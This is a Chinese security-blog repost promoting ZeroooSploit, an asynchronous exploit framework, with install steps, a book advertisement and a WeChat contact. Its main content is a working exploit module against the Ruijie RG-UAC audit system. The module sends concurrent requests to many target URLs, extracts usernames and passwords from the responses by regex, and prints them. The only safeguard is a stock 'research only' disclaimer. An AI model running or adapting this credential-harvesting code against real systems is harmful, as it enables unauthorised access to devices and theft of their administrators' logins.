异步漏洞利用框架 -- ZeroooSploit

admin 2022年7月20日14:03:46安全工具评论10 views2365字阅读7分53秒阅读模式
项目作者:Amzza0x00
项目地址:https://github.com/Amzza0x00/Zerooo-Exploitation-Framework


一、工具介绍
一款异步漏洞利用框架

异步漏洞利用框架 -- ZeroooSploit


二、安装与使用
1、安装需要的库文件
pip install aiohttp
2、下载软件到本地
git clone https://github.com/Amzza0x00/Zerooo-Exploitation-Framework.git
3、进入到该解压目录,运行console.py
cd Zerooo-Exploitation-Frameworkpython3 console.py
4、基本结构
import re
from zerooo.core.asyncpool import async_run # 协程运行from zerooo.core.log import LOGGER # 颜色输出from zerooo.core.options import Option # 设置获取exp属性from zerooo.request.httpclient import HttpClient # 异步http发包from zerooo.utils.util import get_target # 切分多个目标

# 定义Zerooosploit类,继承Optionclass Zerooosploit(Option):
def __init__(self): super(self.__class__, self).__init__() self.info = { 'Name': '锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露', # exp名字 'Module': 'exploit/ruijie/rg-uac-passleak', # exp路径 'Product': '锐捷RG-UAC统一上网行为管理审计系统', # 产品 'Cve': '', # cve编号 'Create_date': '20210411', # 创建日期 'Description': '锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台', # 描述 'Authors': '', # 作者 'References': '' # 参考链接 }
self.option = { """ 注册exp所需参数 Current Setting 参数默认值, Required 可选/必须, Description 参数描述 """ 'targets': {'Current Setting': '', 'Required': 'yes', 'Description': '目标url,多个目标请用,分开'}, 'limit': {'Current Setting': None, 'Required': 'no', 'Description': '并发限制(默认根据当前系统自动调整)'} }
# async def定义异步函数 async def rg_uac_passleak(self, target): # 请求方式、路径等 resp = await HttpClient().send_request_cgi('GET', url=target) return resp
# 定义异步回调函数,用于处理结果 def rg_uac_passleak_callback(self, future): resp = future.result() if resp['code'] == 200: result = resp['text'] user = re.findall('"name":"(.*?)"', result) password = re.findall('"password":"(.*?)"', result) for i in range(len(user)): msg = f'name:{user[i]},password:{password[i]}' LOGGER.success(msg)
else: msg = 'The target ' + str(resp['url']) + ' not vuln !' LOGGER.info(msg)
# 运行方法 def exploit(self): # 调用get_options方法获取参数 targets = get_target(self.get_options('targets')) limit = self.get_options('limit') # async_run 异步调用 arg1 异步对象 arg2 可迭代对象 arg3 异步回调函数 arg4 并发速率 async_run(self.rg_uac_passleak, targets, self.rg_uac_passleak_callback, limit) LOGGER.info('exploit complete')

三、下载地址:
1、通过项目地址下载
2、关注web安全工具库公众号,后台回复:20220719

四、声明:

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。


推荐书籍

加我微信:ivu123ivu,进送书活动群,不定时免费送书


《Web渗透攻防实战》

异步漏洞利用框架 -- ZeroooSploit

漏洞扫描是渗透测试中比较关键的一步,如果能够扫描出漏洞,则可以根据漏洞类型直接进行利用。漏洞扫描也是有技巧和方法可以借鉴的,虽然目前很多公司都加强网络安全防护,但只要挖掘和扫描到一个可以利用的漏洞,就可以从小漏洞到大漏洞逐层循环递进,直接渗透测试目标。对企业而言,防范比攻击更加重要,因此本书从防御的角度来了解攻击方式和方法,通过系统全面的学习,提高防御水平。本书从攻防实战的角度来解释网络安全渗透测试评估扫描、漏洞利用分析和漏洞防御,这对个人和企业具有建设性的意义,最后还结合前沿技术从人工智能角度来介绍如何自动挖掘软件漏洞。

原文始发于微信公众号(web安全工具库):异步漏洞利用框架 -- ZeroooSploit

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月20日14:03:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  异步漏洞利用框架 -- ZeroooSploit http://cn-sec.com/archives/1185725.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: